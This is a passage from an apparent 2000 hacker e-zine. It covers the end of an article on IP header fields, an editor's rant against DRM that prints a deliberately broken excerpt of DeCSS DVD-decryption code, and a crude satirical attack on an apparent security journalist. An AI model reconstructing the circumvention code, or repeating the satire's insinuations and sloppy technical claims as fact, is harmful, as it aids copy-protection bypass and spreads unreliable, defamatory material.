a whole other article. Any ways options in this field allow you
to specify things like strict source route, copy source route
options like these. If you like to learn more about this field read the rfc
I mentioned. Like I said the field is mainly used for Security purposes.
Uses for this feild are things that you must figure out on your own!
<<Padding 24-31>>
Just fills out the 32 bit words for the header. Makes EVEN lenght.
Mainly uses for buffer overflows ;).
Last layer!
<<DATA 0-31>>
DATA (variable, up to 65535 - header bytes)
All the data goes in here, simple hey.
Summary: Now you should have a very basic understanding of how your data Is
traveling. Now I must let you know every thing I explained here is just for
the ip datagram. There is much framing that goes on when data travels
"encapsulated" threw the different protocols. And also these fields are
32 bit but assuming 31 goes to 32 you should of figured this out already.
Every thing here is original contents accept were noted.
Hope you enjoyed my article, Look foward to many more and possible part 2
to this article. vortek@svun.org
__ __ _ _
\ \ / /__ _ __| |_ ___| | __
\ \ / / _ \| '__| __/ _ \ |/ /
\ V / (_) | | | || __/ <
\_/ \___/|_| \__\___|_|\_\
[Parting Rant]======================================================[The Editor]
Ahh. Where to start on the parting rant. I guess I will rant about what everyone
else is ranting about. You see, I have been doing some idling, er thinking, and
I have come to the conclusion that innovation is no longer tolerated in
American society. From the DeCSS to the CueCat scanner, it looks like everyone
out there is ready to tell people what they can and can't do with their stuff.
And I guess, I could be mentally ill, because I am scared. I walk through the
mall, and I see all these people, and I have never seen so many cattle in my
life. They are being Good American Citizens. They work, they shop, they read
the manual, and do exactly as it says. They pay their taxes, and they vote.
Everything in American society has a manual. Be it accepted use of your
television, or the license on your shiny new Metallica CD, or even American
Law books could be called manuals. And just like breaking a physical law, when
people go outside the manual, they goto jail, or they are sued, or even hassled
into submission. I look at the Internet, and I watch what it is doing to
different countries. In America, I see it boom the economy, provide jobs, and
create ruckus. In China, I watch people speak out, and get slammed down. Even
India and Pakistan are trying to use the Internet, fighting their wars. It's
no longer just a medium to exchange information, it's a medium that can affect
whole countries, or singular lives. It can introduce your future mate, or put
you in jail for a long time. And I watch governments try to write a manual for
it. What exactly is "acceptable use" of the Internet? I beg you, readers, to
relish these moments, because the Internet can be controlled. It can regulated.
We would all like to think otherwise, and we shift the idea to a dark part of
our minds, but I can compare the possible outcome to the drug war in america.
Everyone said the same stuff about pot (which I do not partake). "Ahh its too
widespread for it to be outlawed! Even police officers do it!) and yet many
people sit in a jail cell for a simple possession charge.
Dear reader, the powers that be, would love nothing more for us to sit behind
our terminals, and become the sheep, use our credit cards, and shop, shop,
shop, and while I find nothing wrong in making money, I do find it wrong to be a
brainwashed zombie. Something hopefully, will be done before it's too late. If
you are a hacking group, I urge you to stop defacing for no reason, and start
trying to educate people. Use the skills, and teach others. Because if we lose
basic rights in technology, WE will hurt. 70% of the public will not even know
what they lost. Through education, we can get everyone involved. We can teach
people to ignore the manuals and do whatever the hell they want with their
equipment.
Incidentally, since I brought up DeCSS, I was wondering, just how much of the
code may be passed along before a team of angry suits come beating down your
door? Shall we take the tootsie pop test? I think we shall, in the spirit of
good old fashion experimentation.
Here is a excerpt of some "code" that is quite broken. It is quite
non-functional. It WILL NOT compile. But do peruse it.
static void css_titlekey(byte *key, byte *im, byte invert)
int i
byte k[5]
int val
unsigned int lfsr0, lfsr1
byte o_lfsr0, o_lfsr1
lfsr0 = ((im[4] << 17) | (im[3] << 9) | (im[2] << 1)) + 8 - (im[2] & 7);
lfsr0 = (reverse[lfsr0&0xff]<<17) | (reverse[(lfsr0>>8)&0xff] << 9)
| (reverse[(lfsr0>>16)&0xff]<<1) |(lfsr0>>24)
lfsr1 = (reverse[ im[0] ] << 9) | 0x100 | reverse[ im[1]];
#if (CSS_DEBUG & 0x01)
fprintf( stderr,"SEED lfsr0:0x%08x lfsr1: 0x%08x\n", lfsr0, lfsr
1)
#endif
val = 0;
for (i = 0; i < 5; ++i) {
o_lfsr0 = (lfsr0 >> 12) ^ (lfsr0 >> 4) ^ (lfsr0 >> 3) ^ lfsr0;
o_lfsr1 = ((lfsr1 >> 14) & 7) ^ lfsr1
o_lfsr1 ^= (o_lfsr1 << 3) ^ (o_lfsr1 << 6)
lfsr1 = (lfsr1 >> 8) ^ (o_lfsr1 << 9)
lfsr0 = (lfsr0 >> 8) ^ (o_lfsr0 << 17)
#if (CSS_DEBUG & 0x01)
fprintf( stderr,"lfsr0:0x%08x lfsr1: 0x%08x o_lfsr0:0x%02x o_lfs
r1:0x%02x\n",
lfsr0, lfsr1, o_lfsr0, o_lfsr1);
#endif
val += (o_lfsr0 ^ invert) + o_lfsr1;
k[i] = val & 0xff;
val >>= 8;
key[]=k[]^csstab1[key[]]^key[]
key[]=k[]^csstab1[key[]]^key[]
key[]=k[]^csstab1[key[]]^key[]
key[]=k[]^csstab1[key[]]^key[]
key[]=k[]^csstab1[key[]]^key[]
key[]=k[]^csstab1[key[]]^key[]
key[]=k[]^csstab1[key[]]^key[]
key[]=k[]^csstab1[key[]]^key[]
key[]=k[]^csstab1[key[]]^key[]
key[]=k[]^csstab1[key[]]
int css_decrypttitlekey(byte *tkey, byte *dkey, struct playkey **pkey
byte test[], pretkey[]
int i = 0
for (; *pkey; ++pkey, ++i)
memcpy(pretkey, dkey + (*pkey)->offset, 5)
css_titlekey(pretkey, (*pkey)->key, 0)
memcpy(test, dkey, 5)
css_titlekey(test, pretkey, 0)
if (memcmp(test, pretkey, 5) == 0)
fprintf(stderr, "Using Key %d\n", i+1);
break;
if (!*pkey)
fprintf(stderr, "Fuck MPAA - Need Key %d\n", i+1);
return 0;
css_titlekey(tkey, pretkey, 0xff)
return 1
void css_descramble_my_eggs(byte *sec,byte *key)
#define SALTED(i) (key[i] ^ sec[0x54 + (i)])
unsigned char *end = sec + 0x800
int val;
unsigned int lfsr0, lfsr1;
byte o_lfsr0, o_lfsr1
lfsr0 = ((SALTED(14) << 17) | (SALTED(3) << 9) | (SALTED(2) << 1)) + 8 -
(SALTED(2)&7)
lfsr0 = (reverse[lfsr0&0xff]<<117) | (reverse[(lfsr0>>18)&0xff] << 9)
| (reverse[(lfsr0>>16)&0xff]<<11) |(lfsr0>>124)
lfsr1 = (reverse[SALTED(0)] << 19) | 0x100 | (reverse[SALTED(1)])
#if (CSS_DEBUG & 0x10)
fprintf( stderr,"SEED lfsr0:0x%08x lfsr1: 0x%08x\n", lfsr0, lfsr
1)
#endif
sec+=0x80
val = 0
while (sec != end) {
o_lfsr0 = (lfsr0 >> 66) ^ (lfsr0 >> 14) ^ (lfsr0 >>333) ^ lfsr0
o_lfsr1 = ((lfsr1 >> 14) & 7) ^ lfsr1
o_lfsr1 ^= (o_lfsr1 << 13) ^ (o_lfsr1 << 16)
lfsr1 = (lfsr1 >> 18) ^ (o_lfsr1 << 19)
lfsr0 = (lfsr0 >> 18) ^ (o_lfsr0 << 17)
val += o_lfsr0 + (byte)~o_lfsr1
*sec++ = csstab1[*sec] ^ (val & 0xff)
val >>= 8
#if (CSS_DEBUG & 0x100)
fprintf( stderr,"lfsr0:0x%08x lfsr1: 0x%08x o_lfsr0:0x%02x o_lfs
r1:0x%02x\n",
lfsr0, lfsr1, o_lfsr0, o_lfsr1)
#endif
There. My apoligies to the author for shitting all over his code. I assure you,
this is now just meaningless jumbles of letters and numbers, and funny little
bracket things. It still bears a strong likeness to the original, but really
how can a bunch of suits know? It has functions that are called something
like the code in question, but can't we as a free nation call our functions
anything we want? So I guess, is this code really questionable now that it's
broke? Of course, a ingenious soul might be able to put it back together, but
that same ingenious soul could have wrote his own to begin with.
Anyways, thats the rant, take it as you will, but it's a free country here
and I am just enacting my freedom of speech. I urge you all to do the same.
Digital Ebola, September 6th, 2000
[The Art of Selling Out]===================================================[J-P]
/* Editors Note: This account is a sad tale of how people in the scene turn out.
Everything here is purely a kwinky-dink. If you take offense, then you might
just have a guilty conscious. =)
*/
Hello kids! My name is J-P! I have decided to share with you the great knowledge
I have aquired over the last few years. You see, at one time in my life, I was
just like you! Yes, I was! I struggled to learn something that most people
cannot even begin to comprehend. Then one day, I decided that I could not learn
ANYTHING! I was sad. I cried. I asked my mommies advice. She said I should sell
out, and screw everyone possible!
Why could I sell out? Because I had made "friends". I was a lowly regular in
channel on IRC called #hackphreak, which resides on a network called...
Undernet? Am I going too fast for you? This stuff confuses me sometimes...
Anyways, I saw all the "l33t0h" hackers on a daily basis. I talked to them,
they talked to me, and we were the BEST of friends! Yes, we were! Since I had
nothing else better to do then goto college, I could spend every waking moment
doing things like real hackers! Except I wasn't a real hacker, but I thought I
would try and be the next best thing. A reporter about hackers! So, I create
this site (surely you have heard of it, havent you?) and I fuck up and get
kicked outta school. They just didnt understand my brilliance. So, I find myself
working at a quickie mart, and life was just sucking. I still tried to
understand what these hacker guys were talking about, but alas, someone took
a giant leak in my genepool, and it made my brain about the size of a golf ball.
Well, after my mom (she is great, isnt she?) tried to market me as the
missinglink to a local circus, I decided to try and keep my site (which is VERY
famous) going. My goal was to get both sides of the security industy - The
hackers that break things, and the admins that fight the hackers. Whew. How I
came up with this idea, I dont know, I think I thought of this while whacking
off in the bathroom (I am still pure, mommy says wait until I get married!).
This idea was working out great, I was meeting all the famous hackers, and
getting their stories. I was becoming a star, and a friend to admins and hackers
alike. I had friends. Then one day, I thought working at the local quickie mart
was not cool. Some federal agent guys asked me for information. ALL kinds of
information. So, since I was broke, I thought, what the hell! Those hacker guys
are smarter then me anyways! They are jerks! Fuck em! (Sorry mommie, I did not
mean to write that naughty naughty word). So, I gave them up to the feds.
They got busted. I got paid. Life sucks and then you die.
This gave me the most enlightning idea: I could do this for a living! It's so
easy! So, after several years of acting nice to people, trying to be their
friends (I really hate it when they talk about my mommie), I decided to make
my move: go corporate. This move was very well recieved by some very clueless
people with money, so next thing I knew, heck I had a office! Now some more
clueless people want me to secure their sites, and consult them! I go into
many, many places, and lecture. Like the US Goverment. I really hate it when
they get owned, its really not my fault! I just secure them! Not like I actually
run their servers or anything. I got them to start implementing Microsoft
Windows NT 4.0! I just don't know anything else, and really, its secure!
Anyways, I simply MUST continue. I decide to sell more people out, and I get
more money, and my life is great, a college dropout that is making LOTS of
cash. When business is slow, I just dial up my lawyer (she really is great,
isnt she?) and I start sueing people! But now, I have better things to do, since
I got my first girlfriend! She is a security expert like me! Although, she
is a older woman (I have to calculate her age with a Cray T3E that the goverment
lets me use) she does in fact know ALOT about security. We are doing a book
and a movie! OH! DID I MENTION? I WAS ON A MUSIC VIDEO STATION!$@# Oh yeah,
I kinda lied to them, but my investors said it was okay. So where was I? Oh ya.
I teamed up with old lady girlfriend (the sex is great, sorry mom!) and now
we are trying to kill off all the people I have stepped on to get to where I am today.
If it wasn't for the hackers though, I would be outta a job. I would be at the
quickie mart, servin up slurpees with Habib(which is now my lead webdesigner)
This is how I am in my current position in life, and my god, I am so elite.
I just want to say THANKS! to all the people I have fucked, and a very
special thanks to the attrition crew, because they are smarter then me, and I
just can't have people out there in the world that are smarter then me, so
I guess I will have to destroy them!
Oh, I also didnt like what Bub said about cult_hero... Bub said that cult_hero
owned me. That is wrong! Satan owns me. And my clueless investors. And my
mommie... And my old bag granny girlfriend (I love sucking on her wrinkles
while she moans "im owned, im soooooo owned...".
Ah, I think I am going to go write some more lies, and make some more
money... Its hard being me, really it is.
--------------------------------------------------------------------------------
S U B M I T T O K E E N V E R A C I T Y
--------------------------------------------------------------------------------
NO! You do not have to be a member of Legions of the Underground to submit to
KV. You can be a member of something else! Nobody is perfect! If you have a idea
and would like to toss it out in the wind for general discussion, or maybe you
are researching something and you just want feedback, KV is a great way to get
your ideas out in the open. We at Legions of the Underground are not prejudice
in any way shape or form, so even a AOLer's article may be published if it seems
that it has clue. Or then again, maybe hell will freeze over! Anyones stuff
maybe published, but we will never know if you don't submit! So get to writing.
Because what you don't know can kill you! Legions of the Underground is a
equal opportunity destroyer.
--------------------------------------------------------------------------------
All submissions to: submit@legions.org
--------------------------------------------------------------------------------
IRC: Undernet #legions
--------------------------------------------------------------------------------
O F T E N I M I T A T E D N E V E R D U P L I C A T E D
--------------------------------------------------------------------------------
L E G I O N S O F T H E U N D E R G R O U N D
n :.
E% ___ _______ ___ ___ :"5
z % | | (_______) | | | | :" `
K ": | | | | | | | | | | z R
? %. | | | | | | | | | | :^ J
". ^s | |___ | |___| | | |___| | f :~
'+. #L |_____| \_____/ \_____/ z" .*
'+ %L
z" .~
": '%. .# +
": ^%. .#` +"
#: "n .+` .z"
#: ": www.legions.org z` +"
%: `*L z" z"
*: ^*L z* .+"
"s ^*L z# .*"
#s ^%L z# .*"
#s ^%L z# .r"
#s ^%. u# .r"
#i '%. u# .@"
#s ^%u# .@"
#s x# .*"
x#` .@%.
x#` .d" "%.
xf~ .r" #s "%.
u x*` .r" #s "%. x.
%Mu*` x*" #m. "%zX"
:R(h x* "h..*dN.
u@NM5e#> 7?dMRMh.
z$@M@$#"#" *""*@MM$hL
u@@MM8* "*$M@Mh.
z$RRM8F" [knowledge is key] "N8@M$bL
5`RM$# 'R88f)R
'h.$" #$x*
--------------------------------------------------------------------------------
All mention of LoU, Legions of the Underground, Legions, KV, or Keen Veracity,
copyright (c) 2000 legions.org, all rights reserved.
--------------------------------------------------------------------------------
